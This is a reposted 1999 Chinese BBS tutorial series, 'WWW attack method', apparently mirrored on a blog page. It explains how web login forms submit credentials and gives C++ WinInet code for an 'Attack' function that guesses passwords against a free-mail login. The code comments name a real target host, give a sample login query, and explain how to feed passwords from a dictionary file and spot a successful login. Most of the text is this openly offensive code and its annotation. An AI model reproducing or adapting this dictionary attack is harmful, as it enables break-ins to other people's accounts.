WWW攻击法

 

WWW攻击法

贴这篇文章之前
首先向spark说声对不起
本来很早以前就想写这篇文章的
可惜那时候刚好赶上换工作
好了
闲话少说,言归正传

这儿的WWW攻击只限一般站点的攻击
对于采用安全连接的站点还没有试过
一个很好的实践的目标就是各种支持WWW的免费邮件
如果你想用它来进入黄色站点
那也没办法 :)
一般的站点中
如果你想浏览某些需要授权的内容
首先要经过身份验证这一步
就是让你输入用户名、密码
然后浏览器会根据HTML文件中FORM的定义
把这些信息发给服务器来验证
一般的办法是GET或POST
比如在263中
请看下面的263 HTML源代码
     
        用户名: @263.net 口令:  
如果点击"请进吧!",浏览器会向服务器发送一下请求
POST /prog/login/?user=aaa@pass=bbb
既然知道了原理
那我们就可以模拟用户点击的过程

Welcome to NANKAIBBS发信人: bbb (九万里风鹏路), 信区: SysSafe
标 题: WWW攻击法(二)
发信站: 我爱南开站 (Wed Nov 3 08:45:57 1999), 转信

微软给我们提供了一套现成的API让我们可以使用HTTP协议而不需通读RFC文档
现在
我们就可以发动进攻了
请看源程序
不想灌水
我把该程序中读字典的部分和判断攻击是否成功的部分省掉了
但都作了注释
const TCHAR szHeaders[] ="Accept: text/*/r/nUser-Agent: URLHacker/r/n";
//pServer是目标主机名
//cszPostData就是剩下的部分
//比如攻击263的免费邮箱,那么
//pServer="freemail.263.net"
//cszPostData="/prog/login?user=tom&pass=fuck"
//当然,你要先读字典文件,读取pass的值
void Attack(LPSTR pServer,LPSTR cszPostData)
{
    // Open Internet session.
    HINTERNET hSession = ::InternetOpen("URLHacker",
                INTERNET_OPEN_TYPE_PRECONFIG,
                NULL,
                INTERNET_INVALID_PORT_NUMBER,
                0) ;
    // Connect to dest.
    HINTERNET hConnect = ::InternetConnect(hSession,
                pServer,
                INTERNET_INVALID_PORT_NUMBER,
                "",
                "",
                INTERNET_SERVICE_HTTP,
                0,
                0) ;
    // Request the file from the server.
    HINTERNET hHttpFile = ::HttpOpenRequest(hConnect,
                "GET",
                cszPostData,
                HTTP_VERSION,
                NULL,
                0,
                INTERNET_FLAG_DONT_CACHE,
                0) ;
    // Add request headers
    BOOL bAddHeaders = ::HttpAddRequestHeaders(hConnect,szHeaders,lstrlen(szHea
ders),HTTP_ADDREQ_FLAG_ADD);
    // Send the request.
    BOOL bSendRequest = ::HttpSendRequest(hHttpFile, NULL, 0, 0, 0);
    // Get the length of the file.
    char szBuffer[80] ;
    DWORD dwLen = sizeof(szBuffer);
    DWORD dwIndex;
    BOOL bRet = HttpQueryInfo(hHttpFile, HTTP_QUERY_STATUS_CODE,
                szBuffer, &dwLen, NULL);
    DWORD dwRet;
    if (bRet)
          dwRet = (DWORD) atol(szBuffer);
    if (dwRet == HTTP_STATUS_DENIED){
    //这是另外一种验证的办法,和系统的用户名、口令结合起来
    //InternetConnect中第3、4个参数就是用户名和口令
    //下面怎么做不用我说了吧
    }
    if (HttpQueryInfo(hHttpFile, HTTP_QUERY_RAW_HEADERS_CRLF, NULL, &dwLen, 0))

          bRet = TRUE;
    else
    {
          // now that we know how long it is, ask for exactly that much
          // space and really request the header from the API
          LPTSTR pstr = new TCHAR[dwLen];
          bRet = HttpQueryInfo(hHttpFile, HTTP_QUERY_RAW_HEADERS_CRLF, pstr, &dwLen,
&dwIndex);
          delete []pstr;
    }
    // were we redirected?
    // these response status codes come from WININET.H
    if (dwRet == HTTP_STATUS_MOVED ||
          dwRet == HTTP_STATUS_REDIRECT ||
          dwRet == HTTP_STATUS_REDIRECT_METHOD)
    {
    //被重定向到其它地址,需要重新连接到新的地址
    }
         
    // Convert length from ASCII string to a DWORD.
    // Allocate a buffer for the file.
    char* buffer = new char[dwLen+1] ;
    // Read the file into the buffer.
    DWORD dwBytesRead ;
    BOOL bRead = ::InternetReadFile(hHttpFile,
                    buffer,
                    dwLen+1,
                    &dwBytesRead);
    //可以在这儿根据读到的内容判断攻击是否成功
    //怎么?不会!
    //试一下手工猜口令,肯定给你一个出错的画面
    //如果读到的内容中不包括那些错误信息,就又可能成功了
    delete [] buffer;
    ::InternetCloseHandle(hHttpFile);
    ::InternetCloseHandle(hConnect) ;
    ::InternetCloseHandle(hSession) ;
}

Welcome to NANKAIBBS发信人: bbb (九万里风鹏路), 信区: SysSafe
标 题: WWW攻击法(三)—注解
发信站: 我爱南开站 (Wed Nov 3 08:58:58 1999), 转信

创建一个会话
HINTERNET hSession = ::InternetOpen(
        "URLHacker",//Agent名,随便取
        INTERNET_OPEN_TYPE_PRECONFIG,//使用定义的连接方式
        NULL,
        INTERNET_INVALID_PORT_NUMBER,
        0) ;
连接到服务器
HINTERNET hConnect = ::InternetConnect(
        hSession,
        pServer,//服务器名
        INTERNET_INVALID_PORT_NUMBER,
        "",//用户名
        "",//口令
        INTERNET_SERVICE_HTTP,//HTTP
        0,
        0);
向服务器发出请求
HINTERNET hHttpFile = ::HttpOpenRequest(hConnect,
        "GET",//可用GET或POST
          cszPostData,//对应于HTTP命令 GET cdzPostData
          HTTP_VERSION,
          NULL,
          0,
          INTERNET_FLAG_DONT_CACHE,
          0);
加一个请求头,自我炫耀一下,hehe
BOOL bAddHeaders = ::HttpAddRequestHeaders(hConnect,szHeaders,lstrlen(szHead
ers),HTTP_ADDREQ_FLAG_ADD);
接下来,查询该请求返回的信息,然后读之。

 
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值